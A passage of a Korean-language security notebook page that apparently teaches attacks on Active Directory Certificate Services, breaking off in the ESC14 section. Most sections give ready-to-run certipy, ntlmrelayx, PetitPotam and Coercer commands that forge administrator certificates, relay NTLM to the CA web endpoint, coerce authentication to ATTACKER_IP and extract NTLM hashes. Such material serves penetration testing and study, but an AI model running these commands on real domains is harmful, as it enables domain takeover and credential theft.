    <span class="md-ellipsis">
      
        ESC12: CA Shell Access / DCOM
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc13-issuance-policy-linked-group" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC13: Issuance Policy Linked Group
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc14-explicit-mapping" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC14: 약한 Explicit Mapping
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#certify-windows" class="md-nav__link">
    <span class="md-ellipsis">
      
        Certify (Windows)
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc9-no-security-extension" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC9: No Security Extension
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc10" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC10: 약한 인증서 매핑
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc15-version-1-application-policies-cve-2024-49019" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC15: Version 1 템플릿 Application Policies (CVE-2024-49019)
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc16-ca-security-extension" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC16: CA Security Extension 제거
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#certipy" class="md-nav__link">
    <span class="md-ellipsis">
      
        Certipy 주요 명령어
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC 요약
      
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              
              <article class="md-content__inner md-typeset">
                
                  



<h1 id="adcs">ADCS 공격</h1>
<p>Active Directory Certificate Services(ADCS)는 Windows 환경에서 디지털 인증서를 관리하는 서비스.
잘못된 구성이 있을 경우 권한 상승, 지속성 확보, 도메인 장악 등의 심각한 공격이 가능하다.</p>
<hr />
<h2 id="_1">기본 개념</h2>
<h3 id="pki">PKI 구성 요소</h3>
<ul>
<li><strong>Certificate Authority (CA)</strong>: 인증서 발급 및 관리 서버</li>
<li><strong>Certificate Templates</strong>: 요청 가능한 인증서의 형태를 정의</li>
<li><strong>Certificate Store</strong>: 호스트에 저장된 인증서</li>
<li><strong>Auto-enrollment</strong>: 도메인 객체에 대한 자동 인증서 등록</li>
</ul>
<h3 id="_2">인증서 기반 인증</h3>
<p>AD에서 사용하는 인증 방식 3가지:</p>
<ol>
<li>Kerberos</li>
<li>NTLM</li>
<li>ADCS (PKINIT)</li>
</ol>
<p>PKINIT은 인증서를 사용한 Kerberos 인증이다. 유효한 인증서가 있으면 TGT를 요청할 수 있고, 그 과정에서 NTLM 해시를 획득할 수 있다.</p>
<h3 id="adcs_1">ADCS 존재 확인</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="c"># PowerShell</span>
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a><span class="n">net</span> <span class="n">localgroup</span> <span class="s2">&quot;Cert Publishers&quot;</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="c1"># nxc</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a>nxc<span class="w"> </span>ldap<span class="w"> </span>&lt;dc_ip&gt;<span class="w"> </span>-u<span class="w"> </span>&lt;user&gt;<span class="w"> </span>-p<span class="w"> </span>&lt;pass&gt;<span class="w"> </span>-M<span class="w"> </span>adcs
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a>nxc<span class="w"> </span>ldap<span class="w"> </span>&lt;dc_ip&gt;<span class="w"> </span>-u<span class="w"> </span>&lt;user&gt;<span class="w"> </span>-H<span class="w"> </span>&lt;ntlm_hash&gt;<span class="w"> </span>-M<span class="w"> </span>adcs
</code></pre></div>
<hr />
<h2 id="_3">주요 템플릿 속성</h2>
<table>
<thead>
<tr>
<th>속성</th>
<th>설명</th>
<th>취약한 설정</th>
</tr>
</thead>
<tbody>
<tr>
<td>Enrollee Supplies Subject</td>
<td>요청자가 인증서 주체(Subject)를 직접 지정 가능</td>
<td>True</td>
</tr>
<tr>
<td>Requires Manager Approval</td>
<td>관리자 승인 필요 여부</td>
<td>False</td>
</tr>
<tr>
<td>Authorized Signatures Required</td>
<td>요청 승인에 필요한 서명 수</td>
<td>0</td>
</tr>
<tr>
<td>Enrollment Rights</td>
<td>인증서를 요청할 수 있는 사용자/그룹</td>
<td>Domain Users 포함</td>
</tr>
<tr>
<td>EKU (Extended Key Usage)</td>
<td>인증서 용도</td>
<td>Client Authentication 포함</td>
</tr>
<tr>
<td>Any Purpose</td>
<td>모든 용도로 사용 가능</td>
<td>True</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="_4">취약점 탐색</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="c1"># Certipy - 취약한 템플릿 탐색</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a>certipy<span class="w"> </span>find<span class="w"> </span>-vulnerable<span class="w"> </span>-u<span class="w"> </span>&lt;user&gt;<span class="w"> </span>-p<span class="w"> </span><span class="s1">&#39;&lt;pass&gt;&#39;</span><span class="w"> </span>-dc-ip<span class="w"> </span>&lt;dc_ip&gt;<span class="w"> </span>-stdout
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a>
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a><span class="c1"># 결과를 파일로 저장</span>
<a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a>certipy<span class="w"> </span>find<span class="w"> </span>-vulnerable<span class="w"> </span>-u<span class="w"> </span>&lt;user&gt;<span class="w"> </span>-p<span class="w"> </span><span class="s1">&#39;&lt;pass&gt;&#39;</span><span class="w"> </span>-dc-ip<span class="w"> </span>&lt;dc_ip&gt;<span class="w"> </span>-output<span class="w"> </span>result
</code></pre></div>
<hr />
<h2 id="esc1">ESC1: 잘못 구성된 인증서 템플릿</h2>
<p><strong>조건:</strong></p>
<ul>
<li>Enrollee Supplies Subject = True (요청자가 Subject 지정 가능)</li>
<li>Requires Manager Approval = False</li>
<li>Authorized Signatures Required = 0</li>
<li>Enrollment Rights에 공격자가 속한 그룹 포함</li>
<li>EKU에 Client Authentication 포함</li>
</ul>
<p>공격자가 Administrator 등 고권한 사용자를 Subject로 지정하여 인증서를 요청할 수 있다.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="c1"># 인증서 요청 (SAN에 administrator 지정)</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span><span class="s1">&#39;&lt;user&gt;@&lt;domain&gt;&#39;</span><span class="w"> </span>-p<span class="w"> </span><span class="s1">&#39;&lt;pass&gt;&#39;</span><span class="w"> </span>-ca<span class="w"> </span><span class="s1">&#39;&lt;ca_name&gt;&#39;</span><span class="w"> </span><span class="se">\</span>
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="w">  </span>-template<span class="w"> </span><span class="s1">&#39;&lt;template_name&gt;&#39;</span><span class="w"> </span>-upn<span class="w"> </span><span class="s1">&#39;administrator@&lt;domain&gt;&#39;</span><span class="w"> </span><span class="se">\</span>
<a id="__codelineno-3-4" name="__codelineno-3-4" href="#__codelineno-3-4"></a><span class="w">  </span>-target<span class="w"> </span>&lt;dc_fqdn&gt;<span class="w"> </span>-dc-ip<span class="w"> </span>&lt;dc_ip&gt;
<a id="__codelineno-3-5" name="__codelineno-3-5" href="#__codelineno-3-5"></a>
<a id="__codelineno-3-6" name="__codelineno-3-6" href="#__codelineno-3-6"></a><span class="c1"># 획득한 인증서로 인증 → NTLM 해시 획득</span>
<a id="__codelineno-3-7" name="__codelineno-3-7" href="#__codelineno-3-7"></a>certipy<span class="w"> </span>auth<span class="w"> </span>-pfx<span class="w"> </span>administrator.pfx<span class="w"> </span>-domain<span class="w"> </span>&lt;domain&gt;
</code></pre></div>
<hr />
<h2 id="esc2-any-purpose-eku">ESC2: Any Purpose EKU</h2>
<p>EKU에 Any Purpose(2.5.29.37.0) 또는 SubCA가 설정된 템플릿.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="c1"># 조건: Enrollee Supplies Subject 불필요, EKU = Any Purpose 또는 SubCA</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="c1"># SubCA 인증서로 직접 인증은 불가하지만, 다른 인증서를 서명하는 데 악용 가능</span>
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a>
<a id="__codelineno-4-4" name="__codelineno-4-4" href="#__codelineno-4-4"></a><span class="c1"># 인증서 요청</span>
<a id="__codelineno-4-5" name="__codelineno-4-5" href="#__codelineno-4-5"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-ca<span class="w"> </span>CA-NAME<span class="w"> </span>-template<span class="w"> </span>TEMPLATE<span class="w"> </span>-target<span class="w"> </span>DC_IP
<a id="__codelineno-4-6" name="__codelineno-4-6" href="#__codelineno-4-6"></a>
<a id="__codelineno-4-7" name="__codelineno-4-7" href="#__codelineno-4-7"></a><span class="c1"># SubCA 인증서가 발급되면 → CA 인증서처럼 사용하여 다른 인증서 발급 가능 (certipy forge)</span>
</code></pre></div>
<hr />
<h2 id="esc3-enrollment-agent">ESC3: Enrollment Agent 템플릿</h2>
<p>Enrollment Agent 인증서를 획득한 후, 이를 이용해 다른 사용자 명의의 인증서를 대리 요청하는 기법.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="c1"># Step 1: Enrollment Agent 템플릿으로 인증서 요청</span>
<a id="__codelineno-5-2" name="__codelineno-5-2" href="#__codelineno-5-2"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-ca<span class="w"> </span>CA-NAME<span class="w"> </span>-template<span class="w"> </span>EnrollmentAgent<span class="w"> </span>-target<span class="w"> </span>DC_IP
<a id="__codelineno-5-3" name="__codelineno-5-3" href="#__codelineno-5-3"></a>
<a id="__codelineno-5-4" name="__codelineno-5-4" href="#__codelineno-5-4"></a><span class="c1"># Step 2: 획득한 agent 인증서로 다른 사용자의 인증서를 대리 요청</span>
<a id="__codelineno-5-5" name="__codelineno-5-5" href="#__codelineno-5-5"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-ca<span class="w"> </span>CA-NAME<span class="w"> </span>-template<span class="w"> </span>User<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-5-6" name="__codelineno-5-6" href="#__codelineno-5-6"></a><span class="w">  </span>-on-behalf-of<span class="w"> </span><span class="s1">&#39;DOMAIN\administrator&#39;</span><span class="w"> </span>-pfx<span class="w"> </span>enrollment_agent.pfx<span class="w"> </span>-target<span class="w"> </span>DC_IP
<a id="__codelineno-5-7" name="__codelineno-5-7" href="#__codelineno-5-7"></a>
<a id="__codelineno-5-8" name="__codelineno-5-8" href="#__codelineno-5-8"></a><span class="c1"># Step 3: 획득한 인증서로 인증</span>
<a id="__codelineno-5-9" name="__codelineno-5-9" href="#__codelineno-5-9"></a>certipy<span class="w"> </span>auth<span class="w"> </span>-pfx<span class="w"> </span>administrator.pfx<span class="w"> </span>-dc-ip<span class="w"> </span>DC_IP
</code></pre></div>
<hr />
<h2 id="esc4-acl">ESC4: 취약한 템플릿 ACL</h2>
<p>공격자에게 인증서 템플릿에 대한 쓰기 권한이 있으면 템플릿 설정을 ESC1 조건으로 수정한 뒤 ESC1 공격을 수행한다.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="c1"># 템플릿 설정 변경 (기존 설정 백업)</span>
<a id="__codelineno-6-2" name="__codelineno-6-2" href="#__codelineno-6-2"></a>certipy<span class="w"> </span>template<span class="w"> </span>-u<span class="w"> </span>&lt;user&gt;@&lt;domain&gt;<span class="w"> </span>-p<span class="w"> </span><span class="s1">&#39;&lt;pass&gt;&#39;</span><span class="w"> </span><span class="se">\</span>
<a id="__codelineno-6-3" name="__codelineno-6-3" href="#__codelineno-6-3"></a><span class="w">  </span>-template<span class="w"> </span>&lt;template_name&gt;<span class="w"> </span>-save-old<span class="w"> </span>-dc-ip<span class="w"> </span>&lt;dc_ip&gt;
<a id="__codelineno-6-4" name="__codelineno-6-4" href="#__codelineno-6-4"></a>
<a id="__codelineno-6-5" name="__codelineno-6-5" href="#__codelineno-6-5"></a><span class="c1"># ESC1 공격 수행 후 원래 설정으로 복원</span>
</code></pre></div>
<hr />
<h2 id="esc5-pki-acl">ESC5: 취약한 PKI 객체 ACL</h2>
<p>CA 서버, RootCA, NTAuthCertificates 등 PKI 관련 AD 객체에 대한 쓰기 권한이 있는 경우.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="c1"># PKI 관련 AD 객체 ACL 확인</span>
<a id="__codelineno-7-2" name="__codelineno-7-2" href="#__codelineno-7-2"></a>certipy<span class="w"> </span>find<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-dc-ip<span class="w"> </span>DC_IP<span class="w"> </span>-vulnerable
<a id="__codelineno-7-3" name="__codelineno-7-3" href="#__codelineno-7-3"></a>
<a id="__codelineno-7-4" name="__codelineno-7-4" href="#__codelineno-7-4"></a><span class="c1"># 주요 객체:</span>
<a id="__codelineno-7-5" name="__codelineno-7-5" href="#__codelineno-7-5"></a><span class="c1"># CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local</span>
<a id="__codelineno-7-6" name="__codelineno-7-6" href="#__codelineno-7-6"></a><span class="c1">#   ├── CN=AIA           (Authority Information Access)</span>
<a id="__codelineno-7-7" name="__codelineno-7-7" href="#__codelineno-7-7"></a><span class="c1">#   ├── CN=CDP           (CRL Distribution Points)</span>
<a id="__codelineno-7-8" name="__codelineno-7-8" href="#__codelineno-7-8"></a><span class="c1">#   ├── CN=Certification Authorities</span>
<a id="__codelineno-7-9" name="__codelineno-7-9" href="#__codelineno-7-9"></a><span class="c1">#   ├── CN=Enrollment Services</span>
<a id="__codelineno-7-10" name="__codelineno-7-10" href="#__codelineno-7-10"></a><span class="c1">#   └── CN=Certificate Templates</span>
<a id="__codelineno-7-11" name="__codelineno-7-11" href="#__codelineno-7-11"></a>
<a id="__codelineno-7-12" name="__codelineno-7-12" href="#__codelineno-7-12"></a><span class="c1"># 이 객체들에 WriteDACL/WriteProperty 권한이 있으면</span>
<a id="__codelineno-7-13" name="__codelineno-7-13" href="#__codelineno-7-13"></a><span class="c1"># 템플릿 추가/수정, CA 설정 변경 등이 가능</span>
</code></pre></div>
<hr />
<h2 id="esc6-editf_attributesubjectaltname2">ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2</h2>
<p>CA에 이 플래그가 설정되어 있으면 모든 인증서 요청에서 SAN(Subject Alternative Name)을 임의로 지정할 수 있다.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="c1"># 플래그 확인</span>
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a>certutil<span class="w"> </span>-config<span class="w"> </span><span class="s2">&quot;CA-NAME&quot;</span><span class="w"> </span>-getreg<span class="w"> </span><span class="s2">&quot;policy\EditFlags&quot;</span>
<a id="__codelineno-8-3" name="__codelineno-8-3" href="#__codelineno-8-3"></a><span class="c1"># EDITF_ATTRIBUTESUBJECTALTNAME2 – 0x00040000</span>
<a id="__codelineno-8-4" name="__codelineno-8-4" href="#__codelineno-8-4"></a>
<a id="__codelineno-8-5" name="__codelineno-8-5" href="#__codelineno-8-5"></a><span class="c1"># 공격: 아무 템플릿으로 SAN에 administrator 지정</span>
<a id="__codelineno-8-6" name="__codelineno-8-6" href="#__codelineno-8-6"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-ca<span class="w"> </span>CA-NAME<span class="w"> </span>-template<span class="w"> </span>User<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-8-7" name="__codelineno-8-7" href="#__codelineno-8-7"></a><span class="w">  </span>-upn<span class="w"> </span>administrator@domain<span class="w"> </span>-target<span class="w"> </span>DC_IP
<a id="__codelineno-8-8" name="__codelineno-8-8" href="#__codelineno-8-8"></a>
<a id="__codelineno-8-9" name="__codelineno-8-9" href="#__codelineno-8-9"></a>certipy<span class="w"> </span>auth<span class="w"> </span>-pfx<span class="w"> </span>administrator.pfx<span class="w"> </span>-dc-ip<span class="w"> </span>DC_IP
</code></pre></div>
<hr />
<h2 id="esc7-ca-acl">ESC7: 취약한 CA ACL</h2>
<p>ManageCA 또는 Manage Certificates 권한을 가진 사용자가 악용 가능.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="c1"># Step 1: ManageCA 권한으로 SubCA 인증서 요청 (자동 거부됨)</span>
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-ca<span class="w"> </span>CA-NAME<span class="w"> </span>-template<span class="w"> </span>SubCA<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-9-3" name="__codelineno-9-3" href="#__codelineno-9-3"></a><span class="w">  </span>-upn<span class="w"> </span>administrator@domain<span class="w"> </span>-target<span class="w"> </span>DC_IP
<a id="__codelineno-9-4" name="__codelineno-9-4" href="#__codelineno-9-4"></a><span class="c1"># Request ID 기록 (예: 123)</span>
<a id="__codelineno-9-5" name="__codelineno-9-5" href="#__codelineno-9-5"></a>
<a id="__codelineno-9-6" name="__codelineno-9-6" href="#__codelineno-9-6"></a><span class="c1"># Step 2: ManageCA 권한으로 자신에게 Manage Certificates 권한 부여</span>
<a id="__codelineno-9-7" name="__codelineno-9-7" href="#__codelineno-9-7"></a>certipy<span class="w"> </span>ca<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-ca<span class="w"> </span>CA-NAME<span class="w"> </span>-target<span class="w"> </span>DC_IP<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-9-8" name="__codelineno-9-8" href="#__codelineno-9-8"></a><span class="w">  </span>-add-officer<span class="w"> </span>user
<a id="__codelineno-9-9" name="__codelineno-9-9" href="#__codelineno-9-9"></a>
<a id="__codelineno-9-10" name="__codelineno-9-10" href="#__codelineno-9-10"></a><span class="c1"># Step 3: 거부된 요청 승인 (Issue)</span>
<a id="__codelineno-9-11" name="__codelineno-9-11" href="#__codelineno-9-11"></a>certipy<span class="w"> </span>ca<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-ca<span class="w"> </span>CA-NAME<span class="w"> </span>-target<span class="w"> </span>DC_IP<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-9-12" name="__codelineno-9-12" href="#__codelineno-9-12"></a><span class="w">  </span>-issue-request<span class="w"> </span><span class="m">123</span>
<a id="__codelineno-9-13" name="__codelineno-9-13" href="#__codelineno-9-13"></a>
<a id="__codelineno-9-14" name="__codelineno-9-14" href="#__codelineno-9-14"></a><span class="c1"># Step 4: 발급된 인증서 다운로드</span>
<a id="__codelineno-9-15" name="__codelineno-9-15" href="#__codelineno-9-15"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-ca<span class="w"> </span>CA-NAME<span class="w"> </span>-target<span class="w"> </span>DC_IP<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-9-16" name="__codelineno-9-16" href="#__codelineno-9-16"></a><span class="w">  </span>-retrieve<span class="w"> </span><span class="m">123</span>
<a id="__codelineno-9-17" name="__codelineno-9-17" href="#__codelineno-9-17"></a>
<a id="__codelineno-9-18" name="__codelineno-9-18" href="#__codelineno-9-18"></a><span class="c1"># Step 5: 인증</span>
<a id="__codelineno-9-19" name="__codelineno-9-19" href="#__codelineno-9-19"></a>certipy<span class="w"> </span>auth<span class="w"> </span>-pfx<span class="w"> </span>administrator.pfx<span class="w"> </span>-dc-ip<span class="w"> </span>DC_IP
</code></pre></div>
<hr />
<h2 id="esc8-ntlm-relay-to-adcs-http-enrollment">ESC8: NTLM Relay to ADCS HTTP Enrollment</h2>
<p>ADCS의 HTTP enrollment 엔드포인트(certsrv)가 NTLM 인증을 사용하는 경우, NTLM relay를 통해 인증서를 요청할 수 있다.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="c1"># Step 1: Web Enrollment 엔드포인트 확인</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a>curl<span class="w"> </span>-s<span class="w"> </span>http://CA_IP/certsrv/<span class="w"> </span>-I
<a id="__codelineno-10-3" name="__codelineno-10-3" href="#__codelineno-10-3"></a>
<a id="__codelineno-10-4" name="__codelineno-10-4" href="#__codelineno-10-4"></a><span class="c1"># Step 2: ntlmrelayx로 ADCS HTTP 엔드포인트에 relay</span>
<a id="__codelineno-10-5" name="__codelineno-10-5" href="#__codelineno-10-5"></a>impacket-ntlmrelayx<span class="w"> </span>-t<span class="w"> </span>http://CA_IP/certsrv/certfnsh.asp<span class="w"> </span>-smb2support<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-10-6" name="__codelineno-10-6" href="#__codelineno-10-6"></a><span class="w">  </span>--adcs<span class="w"> </span>--template<span class="w"> </span>DomainController
<a id="__codelineno-10-7" name="__codelineno-10-7" href="#__codelineno-10-7"></a>
<a id="__codelineno-10-8" name="__codelineno-10-8" href="#__codelineno-10-8"></a><span class="c1"># Step 3: Coercion으로 DC의 NTLM 인증 유도</span>
<a id="__codelineno-10-9" name="__codelineno-10-9" href="#__codelineno-10-9"></a>python3<span class="w"> </span>PetitPotam.py<span class="w"> </span>ATTACKER_IP<span class="w"> </span>DC_IP
<a id="__codelineno-10-10" name="__codelineno-10-10" href="#__codelineno-10-10"></a><span class="c1"># 또는</span>
<a id="__codelineno-10-11" name="__codelineno-10-11" href="#__codelineno-10-11"></a>python3<span class="w"> </span>Coercer.py<span class="w"> </span>-u<span class="w"> </span>user<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-l<span class="w"> </span>ATTACKER_IP<span class="w"> </span>-t<span class="w"> </span>DC_IP
<a id="__codelineno-10-12" name="__codelineno-10-12" href="#__codelineno-10-12"></a>
<a id="__codelineno-10-13" name="__codelineno-10-13" href="#__codelineno-10-13"></a><span class="c1"># Step 4: 획득한 인증서(Base64)로 인증</span>
<a id="__codelineno-10-14" name="__codelineno-10-14" href="#__codelineno-10-14"></a>certipy<span class="w"> </span>auth<span class="w"> </span>-pfx<span class="w"> </span>dc.pfx<span class="w"> </span>-dc-ip<span class="w"> </span>DC_IP
</code></pre></div>
<div class="admonition tip">
<p class="admonition-title">EPA (Extended Protection for Authentication)</p>
<p>EPA가 활성화되면 relay 불가. <code>certipy find</code>의 <code>Web Enrollment</code> 섹션에서 EPA 설정 확인.</p>
</div>
<hr />
<h2 id="esc11-if_enforceencrypticertrequest">ESC11: IF_ENFORCEENCRYPTICERTREQUEST</h2>
<p>CA의 RPC 인터페이스에 암호화가 적용되지 않은 경우, RPC relay를 통한 공격이 가능하다.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="c1"># RPC relay (ESC8의 RPC 버전)</span>
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a><span class="c1"># certipy relay 사용</span>
<a id="__codelineno-11-3" name="__codelineno-11-3" href="#__codelineno-11-3"></a>certipy<span class="w"> </span>relay<span class="w"> </span>-ca<span class="w"> </span>CA_IP<span class="w"> </span>-template<span class="w"> </span>DomainController
<a id="__codelineno-11-4" name="__codelineno-11-4" href="#__codelineno-11-4"></a>
<a id="__codelineno-11-5" name="__codelineno-11-5" href="#__codelineno-11-5"></a><span class="c1"># Coercion으로 인증 유도</span>
<a id="__codelineno-11-6" name="__codelineno-11-6" href="#__codelineno-11-6"></a>python3<span class="w"> </span>PetitPotam.py<span class="w"> </span>ATTACKER_IP<span class="w"> </span>DC_IP
</code></pre></div>
<hr />
<h2 id="esc12-ca-shell-access-dcom">ESC12: CA Shell Access / DCOM</h2>
<p>CA 서버에 대한 셸 접근 권한 또는 DCOM 접근 권한이 있으면, <code>certutil</code>이나 DCOM 인터페이스(<code>ICertRequest</code>)를 통해 직접 인증서를 발급할 수 있다.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="c1"># CA 서버에 셸 접근이 있는 경우</span>
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a><span class="c1"># certutil로 직접 인증서 발급</span>
<a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a>certutil<span class="w"> </span>-config<span class="w"> </span><span class="s2">&quot;CA-SERVER\CA-NAME&quot;</span><span class="w"> </span>-submit<span class="w"> </span>request.req
<a id="__codelineno-12-4" name="__codelineno-12-4" href="#__codelineno-12-4"></a>
<a id="__codelineno-12-5" name="__codelineno-12-5" href="#__codelineno-12-5"></a><span class="c1"># DCOM을 통한 원격 인증서 발급</span>
<a id="__codelineno-12-6" name="__codelineno-12-6" href="#__codelineno-12-6"></a><span class="c1"># CA 서버의 ICertRequest DCOM 인터페이스 사용</span>
<a id="__codelineno-12-7" name="__codelineno-12-7" href="#__codelineno-12-7"></a><span class="c1"># certipy로 DCOM 기반 인증서 요청</span>
<a id="__codelineno-12-8" name="__codelineno-12-8" href="#__codelineno-12-8"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-ca<span class="w"> </span>CA-NAME<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-12-9" name="__codelineno-12-9" href="#__codelineno-12-9"></a><span class="w">  </span>-template<span class="w"> </span>User<span class="w"> </span>-upn<span class="w"> </span>administrator@domain<span class="w"> </span>-target<span class="w"> </span>CA_IP
</code></pre></div>
<hr />
<h2 id="esc13-issuance-policy-linked-group">ESC13: Issuance Policy Linked Group</h2>
<p>인증서 템플릿에 Issuance Policy가 설정되고, 해당 정책이 OID 그룹에 링크되어 있을 때. 인증서를 발급받으면 해당 그룹의 권한을 획득할 수 있다.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="c1"># certipy로 Issuance Policy 링크 확인</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a>certipy<span class="w"> </span>find<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-dc-ip<span class="w"> </span>DC_IP<span class="w"> </span>-vulnerable
<a id="__codelineno-13-3" name="__codelineno-13-3" href="#__codelineno-13-3"></a>
<a id="__codelineno-13-4" name="__codelineno-13-4" href="#__codelineno-13-4"></a><span class="c1"># 취약 템플릿으로 인증서 요청 → 링크된 그룹 권한 획득</span>
<a id="__codelineno-13-5" name="__codelineno-13-5" href="#__codelineno-13-5"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-ca<span class="w"> </span>CA-NAME<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-13-6" name="__codelineno-13-6" href="#__codelineno-13-6"></a><span class="w">  </span>-template<span class="w"> </span>TEMPLATE<span class="w"> </span>-target<span class="w"> </span>DC_IP
<a id="__codelineno-13-7" name="__codelineno-13-7" href="#__codelineno-13-7"></a>certipy<span class="w"> </span>auth<span class="w"> </span>-pfx<span class="w"> </span>user.pfx<span class="w"> </span>-dc-ip<span class="w"> </span>DC_IP
</code></pre></div>
<hr />
<h2 id="esc14-explicit-mapping">ESC14: 약한 Explicit Mapping</h2>
<p>인증서 매핑이 altSecurityIdentities 속성에 의존하며, 해당 속성에 대한 쓰기 권한이 있으면 다른 사용자의 매핑을 조작할 수 있다.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="c1"># altSecurityIdentities에 자신의 인증서를 다른 사용자에게 매핑</span>
